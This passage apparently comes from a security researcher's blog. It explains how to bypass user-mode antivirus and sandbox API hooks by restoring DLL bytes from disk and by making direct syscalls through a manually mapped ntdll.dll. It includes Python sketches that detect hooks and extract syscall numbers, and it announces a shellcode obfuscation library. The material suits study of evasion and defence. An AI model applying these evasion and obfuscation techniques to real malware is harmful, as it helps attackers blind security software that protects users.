Now that you know how real-time protection works and how exactly it involves API hooking, I can proceed to explain the methods of bypassing it.

There are AV products on the market that perform real-time monitoring in kernel-mode (Ring0), but this is out of scope of this post and I will focus only on bypassing protections of AV products that perform monitoring in user-mode (Ring3).

The Unhooking Flashbang

As you already know, real-time protection relies solely on the API hook handlers being executed. Only when the AV hook handler is executed can the protection software register the API call, monitor the parameters and continue mapping the process activity.

It is obvious that in order to completely disable the protection, we need to remove the API hooks; as a result, the protection software will become blind to everything we do.

In our own application, we control the entire process memory space. The AV, with its injected code, is just an intruder trying to tamper with our software's functionality - but we are the king of our land.

The steps to take are as follows:

  1. Enumerate all loaded DLL libraries in current process.
  2. Find entry-point address of every imported API function of each DLL library.
  3. Remove the injected hook JMP instruction by replacing it with the API's original bytes.

It all seems fairly simple, up until the point of restoring the API function's original code from before the hook JMP was injected. Getting the original bytes from the hook handlers is out of the question, as there is no way to find out which part of the handler's code is the original API function prologue. So, how do we find the original bytes?

The answer is: manually retrieve them by reading the respective DLL library file stored on disk. The DLL files contain all the original code.

In order to find the original first 16 bytes (which is more than enough) of CreateFileW API, the process is as follows:

  1. Read the contents of kernel32.dll file from Windows system folder into memory. I will call this module raw_module.
  2. Get the base address of the imported kernel32.dll module in our current process. I will call the imported module imported_module.
  3. Fix the relocations of the manually loaded raw_module with base address of imported_module (retrieved in step 2). This will make all fixed address memory references look the same as they would in the current imported_module (complying with ASLR).
  4. Parse the raw_module export table and find the address of CreateFileW API.
  5. Copy the original 16 bytes from the found exported API address to the address of the currently imported API where the JMP hook resides.

This will effectively overwrite the current JMP with the original bytes of any API.
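
As an illustration, here is a minimal Python sketch (assuming the pefile module) that detects a hook on CreateFileW by comparing the first bytes in memory against the clean copy on disk; restoring would then be a matter of writing the clean bytes back after applying relocations, as described above:

import ctypes
import pefile  # pip install pefile

kernel32 = ctypes.windll.kernel32
kernel32.GetModuleHandleW.restype = ctypes.c_void_p

# base address of kernel32.dll as loaded in our own process
base = kernel32.GetModuleHandleW('kernel32.dll')

# clean copy of the library, read straight from disk
pe = pefile.PE(r'C:\Windows\System32\kernel32.dll')
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
    if exp.name == b'CreateFileW':
        clean = pe.get_data(exp.address, 16)             # bytes from the file
        live = ctypes.string_at(base + exp.address, 16)  # bytes in memory
        if clean != live:
            # note: relocated absolute addresses can also cause a mismatch,
            # so a full implementation applies relocations first (step 3)
            print('CreateFileW looks hooked:')
            print('  disk  :', clean.hex())
            print('  memory:', live.hex())
        break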

If you want to read more about parsing Portable Executable files, the best tutorial was written by Iczelion (the website has a great 90s feel too!). Among many subjects, you can learn about parsing the import and export tables of PE files.

When parsing the import table, you need to keep in mind that Microsoft, with the release of Windows 7, introduced a strange creature called the API Set Schema. It is very important to properly parse the imports pointing to these DLLs. There is a very good explanation of this entity by Geoff Chappell in his The API Set Schema article.

Stealth Calling

The API unhooking method may fool most AV products that perform their behavioural analysis in user-mode. It does not, however, fool automated sandbox analysis tools like Cuckoo Sandbox. Cuckoo is apparently able to detect when the API hooks it put in place have been removed. That makes the previous method ineffective in the long run.

I thought of another method to bypass AV/sandbox monitoring. I am positive it would work, even though I have yet to put it into practice. There is surely already malware out there implementing this technique.

First of all, I must mention that the ntdll.dll library serves as the direct passage between user-mode and kernel-mode. Its exported APIs communicate directly with the Windows kernel using syscalls. Most of the other Windows libraries eventually call APIs from ntdll.dll.

Let's take a look at the code of ZwCreateFile API from ntdll.dll on Windows 7 in WOW64 mode:

77D200F4 > B8 52000000                  MOV EAX,52
77D200F9   33C9                         XOR ECX,ECX
77D200FB   8D5424 04                    LEA EDX,DWORD PTR SS:[ESP+4]
77D200FF   64:FF15 C0000000             CALL DWORD PTR FS:[C0]
77D20106   83C4 04                      ADD ESP,4
77D20109   C2 2C00                      RETN 2C

Basically, what it does is pass EAX = 0x52, with the stack arguments pointer in EDX, to the function stored in the TIB at offset 0xC0. The call switches the CPU from 32-bit to 64-bit mode and executes the syscall to NtCreateFile in Ring0. 0x52 is the syscall number for NtCreateFile on my Windows 7 system, but syscall numbers differ between Windows versions and even between Service Packs, so it is never a good idea to rely on them. You can find more information about syscalls on Simone Margaritelli's blog here.

Most protection software will hook the ntdll.dll APIs, as that is the lowest level you can get to, right on the kernel's doorstep. For example, if you only hook CreateFileW in kernel32.dll, which eventually calls ZwCreateFile in ntdll.dll, you will never catch direct API calls to ZwCreateFile. A hook in the ZwCreateFile API, though, will be triggered every time CreateFileW or CreateFileA is called, as both must eventually call the lowest-level API that communicates directly with the kernel.

There is always exactly one loaded instance of any imported DLL module. That means that if an AV or sandbox solution wants to hook an API of a chosen DLL, it will find that module in the current process's imported modules list. Following the DLL module's export table, it will find and hook the exported API function of interest.

Now, to the interesting part. What if we copied the code snippet I pasted above from ntdll.dll and implemented it in our own application's code? This would be an identical copy of the ntdll.dll code, executing the 0x52 syscall from within our own code section. No user-mode protection software would ever find out about it. It is an ideal method of bypassing any API hooks without actually detecting and unhooking them!

The thing is, as I mentioned before, we cannot trust the syscall numbers, as they differ between Windows versions. What we can do, though, is read the whole ntdll.dll library file from disk and manually map it into the current process's address space. That way, we can execute code that was prepared exclusively for our version of Windows, while having an exact copy of ntdll.dll outside of the AV's reach.
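
For example, here is a quick Python sketch (again assuming the pefile module) that pulls the correct NtCreateFile syscall number for the running system out of the on-disk ntdll.dll, untouched by any user-mode hooks:

import pefile  # pip install pefile

# parse a clean ntdll.dll straight from disk
pe = pefile.PE(r'C:\Windows\System32\ntdll.dll')

for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
    if exp.name == b'NtCreateFile':
        stub = pe.get_data(exp.address, 8)
        if stub[0] == 0xB8:                    # 32-bit stub: MOV EAX, imm32
            number = int.from_bytes(stub[1:5], 'little')
        elif stub[:4] == b'\x4c\x8b\xd1\xb8':  # 64-bit stub: MOV R10,RCX; MOV EAX, imm32
            number = int.from_bytes(stub[4:8], 'little')
        else:
            break
        print(f'NtCreateFile syscall number: {number:#x}')
        break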

I mentioned ntdll.dll first because this DLL doesn't have any dependencies - it doesn't have to load any other DLLs and call their APIs. Every one of its exported functions passes execution directly to the kernel, not to other user-mode DLLs. That shouldn't stop you from manually importing any other DLL (like kernel32.dll or user32.dll) the same way, as long as you make sure to walk through the DLL's import table and populate it manually, recursively importing all of the library's dependencies. That way, the manually mapped modules will use only other manually mapped dependencies and will never have to touch the modules that were loaded into the address space when the program started.

Afterwards, it is only a matter of calling the API functions from your manually mapped DLL files in memory, and you can be sure that no AV or sandbox software will ever be able to detect or hook such calls in user-mode.

Conclusion

There is certainly nothing that user-mode AV or sandbox software can do about the evasion methods described above, other than going deeper into Ring0 and monitoring process activity from the kernel.

The unhooking method can be countered by the protection software re-hooking the API functions, but then the APIs can be unhooked again and the cat-and-mouse game never ends. In my opinion, the stealth calling method is much more professional, as it is completely unintrusive, but it is a bit harder to implement. I may spend some time on an implementation that I will test against all the popular sandbox analysis software and publish the results.

As always, I'm happy to hear your feedback or ideas.

You can hit me up on Twitter @mrgretzky or send an email to [email protected].

Enjoy and see you next time!

Obfusion - C++ X86 Code Obfuscation Library

6 July 2016 at 16:19

After several weeks of research, having produced proof-of-concept code in Python, I have finally found some time to code the obfuscation library in a proper programming language. I have named the library Obfusion and I will make sure to expand its functionality in the future.

Obfusion, at the moment, is able to obfuscate code the same way the Python version does, but I made sure the code is cleaner and more optimized. The obfuscation process should be much faster than before, and I'm sure it can be optimized even further.

Here is a short demo of the library's capabilities. Take a look at this disassembled shellcode sample. The shellcode just executes calc.exe via the WinExec API:

Original shellcode disassembly - exec_calc.lst

I ran this shellcode through the Obfusion obfuscator, performing 3 obfuscation passes, and here is the disassembled obfuscated shellcode, which performs the same tasks as the original:

Obfuscated shellcode disassembly - output.lst

As you can see, that makes it pretty hard to analyze. The shellcode size increased from 189 bytes to 357,236 bytes, and you can increase the obfuscation complexity even more at the cost of obfuscation speed.

Those of you who haven't followed my previous research posts on obfuscation can catch up here:

X86 Shellcode Obfuscation - Part 1

X86 Shellcode Obfuscation - Part 2

X86 Shellcode Obfuscation - Part 3


GitHub

You can follow the development of the Obfusion library on my Github project page here:

Obfusion - full source code on GitHub


Coming up

Make sure to watch this space, as I plan to release blog posts on how to prepare your Metasploit Meterpreter shellcodes to be obfuscation-friendly (they currently are not), and I will also demonstrate the best ways to infect any Portable Executable file with your own shellcode.

As always, if you want more of what you just read, follow me on Twitter @mrgretzky or send those heart-warming emails to [email protected].

See you soon and have fun with the library!

โŒ
โŒ